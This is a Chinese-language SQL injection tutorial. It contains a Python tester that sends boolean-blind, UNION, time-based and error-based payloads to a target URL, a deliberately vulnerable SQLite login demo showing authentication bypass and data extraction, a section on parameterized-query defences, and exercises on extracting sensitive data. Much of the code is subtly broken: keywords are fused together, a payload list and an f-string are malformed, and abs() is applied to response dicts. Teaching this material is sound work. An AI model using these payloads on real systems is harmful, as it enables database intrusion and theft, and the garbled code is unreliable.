## 引言
SQL注入(SQL Injection,简称SQLi)长期位居OWASP Top 10榜首。它是通过将恶意SQL代码插入到合法的SQL查询中,从而绕过认证、获取敏感数据甚至操控服务器。
本文将学习如何在授权安全测试中检测和利用SQL注入漏洞。
>**法律声明**:SQL注入技术仅可用于你拥有明确授权的系统和设备。未经授权对他人系统进行SQL注入测试可能构成犯罪。
## 第一部分:理解SQL注入原理
```python
import sqlite3
import io
from typing import List, Tuple, Optional
from dataclasses import dataclass, field
@dataclass
classInjectionPoint:
"""注入点信息"""
name: str
parameter: str
location: str# "GET" or "POST"
current_value: str
db_type: str = "Unknown"
vulnerable: bool = False
injection_type: str = ""
classSQLInjectionTester:
"""
SQL注入检测测试器(教学用途)
模拟各种注入手法,帮助理解漏洞原理和检测方法。
"""
# 常见的注入测试payload
TEST_PAYLOADS = {
"basic": ["'", '"', "`", "')", "');", '" AND 1=1 --'),
"boolean_blind": [
"' AND 1=1 --", # True case
"' AND 1=2 --", # False case
"' AND LENGTH(DATABASE())=LENGTH(DATABASE()) --", # True
],
"union_based": [
"' UNION SELECT NULL --",
"' UNION SELECT NULL,NULL --",
"' UNION SELECT NULL,NULL,NULL --",
"' UNION SELECT TABLE_NAME,NULL FROM INFORMATION_SCHEMA.TABLES --",
"' UNION SELECT COLUMN_NAME,NULL FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='users' --",
],
"time_based": [
"'; WAITFOR DELAY '0:0:5' --", # SQL Server
"'; SELECT PG_SLEEP(5) --", # PostgreSQL
"'; SELECT CASE WHEN (1=1) THEN RANDOMBLOB(100000000) ELSE 1 END --", # SQLite
],
"error_based": [
"' AND EXTRACTVALUE(1, CONCAT(0x7e, VERSION())) --", # MySQL
"' AND 1=CAST((SELECT DATABASE()) AS INT) --", # Oracle
],
}
def__init__(self, target_url: str):
self.target_url = target_url
self.vulnerable_points = []
self.found_tables = []
self.found_columns = []
self.found_data = []
def _check_boolean_injection(
self, param_name: str, base_value: str = "1"
) ->bool:
"""
布尔盲注检测
原理:
- 发送正常请求,记录响应长度
- 发送 AND 1=1,响应应该正常(True)
- 发送 AND 1=2,响应应该不同(False)
- 如果两次响应差异明显,可能存在布尔盲注
这是一个简化的教学演示
"""
print(f"[*] 测试布尔盲注: {param_name}")
# 正常请求
normal_resp_len = self._simulate_request(param_name, base_value)
# True case
true_resp_len = self._simulate_request(
param_name, f"{base_value}' AND 1=1 --"
)
# False case
false_resp_len = self._simulate_request(
param_name, f"{base_value}' AND 1=2 --"
)
# 判断是否存在差异
true_diff = abs(true_resp_len - normal_resp_len)
false_diff = abs(false_resp_len - normal_resp_len)
if true_diff < 50and false_diff > 50:
print(f"[+] 可能发现布尔盲注漏洞!")
print(f" 正常: {normal_resp_len} vs "
f"True: {true_resp_len} vs False: {false_resp_len}")
returnTrue
print(f" 正常: {normal_resp_len} "
f"| True: {true_resp_len} (diff: {true_diff}) "
f"| False: {false_resp_len} (diff: {false_diff})")
returnFalse
def _check_union_injection(
self, param_name: str, base_value: str = "1"
) -> List[Tuple]:
"""
联合注入检测
原理: 通过UNION SELECT将恶意查询附加到原查询后面,
提取目标数据库的信息。
"""
print(f"[*] 测试联合注入: {param_name}")
# 尝试不同数量的列
results = []
for num_cols inrange(1, 6):
payload = f"' UNION SELECT {'',''.join(['NULL'for _ inrange(num_cols)]),"} --"
resp = self._simulate_request(param_name, payload)
if resp["error"] isNoneand resp["status"] != 404:
results.append({
"columns": num_cols,
"response_length": len(resp["body"]),
"payload": payload
})
print(f" {num_cols}列: 响应长度 {len(resp['body'])}")
return results
def _check_time_based(
self, param_name: str, base_value: str = "1"
) ->float:
"""
时间盲注检测
原理: 注入包含时间延迟的SQL语句,
如果响应明显延迟,说明注入成功。
"""
import time
print(f"[*] 测试时间盲注: {param_name}")
# 正常请求
start = time.time()
self._simulate_request(param_name, base_value)
normal_time = time.time() - start
# 带延迟的注入(SQLite版本)
start = time.time()
payload = f"{base_value}'; SELECT CASE WHEN (1=1) THEN RANDOMBLOB(50000000) ELSE 1 END --"
self._simulate_request(param_name, payload)
delayed_time = time.time() - start
delay = delayed_time - normal_time
print(f" 正常: {normal_time:.2f}s | 注入后: {delayed_time:.2f}s "
f"(延迟: {delay:.2f}s)")
if delay > 2.0:
print(f"[+] 可能存在时间盲注!")
return delay
def _simulate_request(
self, param_name: str, value: str
) ->dict:
"""
模拟HTTP请求响应
在实际测试中,这里应该替换为真实的HTTP请求
"""
import requests
try:
url = self.target_url.replace(f"{param_name}=.*",
f"{param_name}={value}")
resp = requests.get(url, timeout=10)
return {
"body": resp.text,
"status": resp.status_code,
"error": None
}
except requests.exceptions.RequestException as e:
return {
"body": "",
"status": 0,
"error": str(e)
}
def run_full_test(
self,
params: List[str],
base_values: Optional[dict] = None
) -> List[InjectionPoint]:
"""
全面SQL注入测试
Args:
params: 要测试的参数名列表
base_values: 参数的基值(可选)
"""
print("=" * 60)
print("SQL注入全面检测")
print(f"目标: {self.target_url}")
print("=" * 60)
for param in params:
base_val = (base_values or {}).get(param, "1")
print(f"\n{'─' * 40}")
print(f"测试参数: {param} (初始值: {base_val})")
# 布尔盲注
ifself._check_boolean_injection(param, base_val):
self.vulnerable_points.append(
InjectionPoint(param, param, "GET", base_val,
"MySQL", True, "Boolean Blind")
)
# 联合注入
union_results = self._check_union_injection(param, base_val)
if union_results:
self.vulnerable_points.append(
InjectionPoint(param, param, "GET", base_val,
"MySQL", True, "Union-Based")
)
# 时间盲注
self._check_time_based(param, base_val)
print(f"\n{'=' * 60}")
ifself.vulnerable_points:
print(f"发现 {len(self.vulnerable_points)} 个潜在注入点:")
for vp inself.vulnerable_points:
print(f" ⚠️ {vp.parameter} [{vp.injection_type}]")
else:
print("未发现明显的SQL注入漏洞")
print(f"{'=' * 60}")
returnself.vulnerable_points
```
## 第二部分:SQLite安全演示——注入是如何工作的
为了直观理解SQL注入的危害,我们用一个简化示例演示:
```python
classSQLInjectionDemo:
"""
SQL注入演示(安全沙箱环境)
创建一个本地的SQLite数据库,模拟SQL注入的效果。
这可以帮助你理解为什么参数化查询如此重要。
"""
def__init__(self):
self.conn = sqlite3.connect(":memory:")
self._setup_demo_database()
def_setup_demo_database(self):
"""创建演示用数据库"""
cursor = self.conn.cursor()
# 创建users表
cursor.execute("""
CREATE TABLE IF NOT EXISTS users (
id INTEGER PRIMARY KEY,
username TEXT NOT NULL,
password TEXT NOT NULL,
email TEXT
)
""")
# 插入测试数据
users = [
(1, "admin", "hashed_pw_1", "admin@example.com"),
(2, "john", "hashed_pw_2", "john@example.com"),
(3, "alice", "hashed_pw_3", "alice@example.com"),
(4, "bob", "hashed_pw_4", "bob@example.com"),
]
cursor.executemany(
"INSERT INTO users VALUES (?, ?, ?, ?)", users
)
self.conn.commit()
print("[✓] 演示数据库已准备就绪")
print(f" 包含 {cursor.execute('SELECT COUNT(*) FROM users').fetchone()[0]} 条用户记录")
def_unsafe_query(self, username: str, password: str) -> List[Tuple]:
"""
不安全的查询(直接使用字符串拼接)
这就是SQL注入的来源!
⚠️ 这段代码故意不安全,仅用于演示
"""
cursor = self.conn.cursor()
unsafe_sql = (
f"SELECT * FROM users "
f"WHERE username = '{username}' "
f"AND password = '{password}'"
)
print(f"\n[⚠️ 不安全SQL] {unsafe_sql}")
try:
cursor.execute(unsafe_sql)
return cursor.fetchall()
except sqlite3.Error as e:
print(f"[SQL错误] {e}")
return []
def_safe_query(
self, username: str, password: str
) -> List[Tuple]:
"""
安全的查询(使用参数化查询)
这是推荐的写法!
"""
cursor = self.conn.cursor()
cursor.execute(
"SELECT * FROM users "
"WHERE username = ? AND password = ?",
(username, password)
)
return cursor.fetchall()
defdemonstrate_injection(self):
"""演示SQL注入攻击"""
print("\n" + "=" * 60)
print("SQL注入攻击演示")
print("=" * 60)
# 攻击1:万能密码绕过
print("\n【攻击1: 万能密码绕过认证】")
evil_username = "' OR '1'='1' --"
evil_password = "anything"
print(f"\n尝试登录...")
print(f"用户名: '{evil_username}'")
print(f"密码: '{evil_password}'")
results = self._unsafe_query(evil_username, evil_password)
print(f"\n[!] 注入成功! 获取到 {len(results)} 条用户记录:")
for row in results:
print(f" {row}")
# 攻击2:数据提取
print("\n【攻击2: 提取所有用户数据】")
extract_payload = "' UNION SELECT id, username, password, email FROM users --"
print(f"\n尝试提取数据...")
results = self._unsafe_query(extract_payload, "dummy")
print(f"\n[!] 数据泄露! 获取到:")
for row in results:
print(f" {row}")
# 对比:安全查询
print("\n" + "-" * 60)
print("对比:安全的参数化查询")
print("-" * 60)
print(f"\n尝试相同的攻击(安全查询)...")
results = self._safe_query(evil_username, evil_password)
print(f"结果: {results}")
print(f"[✓] 安全查询成功阻止了注入攻击!")
defdemonstrate_information_extraction(self):
"""演示信息提取"""
print("\n" + "=" * 60)
print("SQL注入信息提取演示")
print("=" * 60)
# 提取数据库版本
version_payload = "' UNION SELECT 1, sqlite_version(), 3, 4 --"
print(f"\n提取数据库版本...")
results = self._unsafe_query(version_payload, "dummy")
if results:
print(f"[!] 数据库版本: {results[0][1]}")
# 提取表名
table_payload = (
"' UNION SELECT 1, name, 3, 4 "
"FROM sqlite_master "
"WHERE type='table' AND name NOT LIKE 'sqlite_%' --"
)
print(f"\n提取表名...")
results = self._unsafe_query(table_payload, "dummy")
if results:
print(f"[!] 找到的表: {[r[1] for r in results]}")
# ===== 防御方案 =====
classSQLInjectionDefense:
"""SQL注入防御方案"""
@staticmethod
defsanitize_input(value: str) -> str:
"""
输入清洗(不推荐单独使用,仅作为辅助手段)
注意:仅依赖输入清洗不够安全,
应该主要使用参数化查询。
"""
dangerous_chars = ["'", '"', ";", "--", "/*", "*/", "\\"]
sanitized = value
for char in dangerous_chars:
sanitized = sanitized.replace(char, "")
return sanitized
@staticmethod
defwhitelist_validation(value: str, allowed_pattern: str) -> bool:
"""
白名单验证(推荐)
对输入进行严格的内容限制。
"""
import re
returnbool(re.match(allowed_pattern, value))
@staticmethod
defparameterized_query_example():
"""
展示正确的参数化查询用法
"""
print("\n" + "=" * 60)
print("参数化查询最佳实践")
print("=" * 60)
examples = [
{
"bad": "sql = f\"SELECT * FROM users WHERE id = {user_id}\"",
"good": "cursor.execute('SELECT * FROM users WHERE id = ?', (user_id,))"
},
{
"bad": "sql = f\"SELECT * FROM users WHERE name = '{name}'\"",
"good": "cursor.execute('SELECT * FROM users WHERE name = ?', (name,))"
},
{
"bad": "sql = f\"INSERT INTO logs VALUES ('{action}', '{time}')\"",
"good": "cursor.execute('INSERT INTO logs VALUES (?, ?)', (action, timestamp))"
},
]
for i, ex inenumerate(examples, 1):
print(f"\n示例 {i}:")
print(f" ❌ 不安全: {ex['bad']}")
print(f" ✅ 安全: {ex['good']}")
print("\n" + "-" * 60)
print("核心原则:")
print(" 1. 永远不要直接将用户输入拼接到SQL语句中")
print(" 2. 始终使用参数化查询 (?)")
print(" 3. 对输入进行严格的类型和格式验证")
print(" 4. 遵循最小权限原则(数据库账户只授予必要权限)")
# ==================== 实战练习 ====================
### 练习1:布尔盲注提取工具
编写一个工具,通过布尔盲注逐步提取数据库信息:
- 探测数据库类型和版本
- 枚举数据库中的表名
- 提取指定表的所有字段名
- 逐条读取数据记录
### 练习2:Union注入列数探测
实现一个自动化脚本,探测目标页面的UNION注入所需列数:
- 从1列开始递增尝试
- 根据响应特征判断列数匹配
- 找到匹配的列数后,尝试提取敏感数据
### 练习3:SQL注入防护审计工具
编写一个代码审计工具,扫描Python项目中的SQL注入风险:
- 检测字符串拼接SQL(f-string / % / .format)
- 检测execute()中的非参数化查询
- 输出风险文件列表和建议修复方案
## 总结
本篇教程涵盖了:
- ✅ SQL注入原理与分类(布尔盲注、联合注入、时间盲注、报错注入)
- ✅ SQLite安全演示——理解注入危害
- ✅ 参数化查询最佳实践
- ✅ 输入清洗与白名单验证
掌握了SQL注入检测与防御后,下一篇我们将学习:**XSS跨站脚本检测与防护**——理解脚本注入的原理、类型及防御策略。
---
> ⚖️ **版权声明**:本教程仅供学习和研究用途。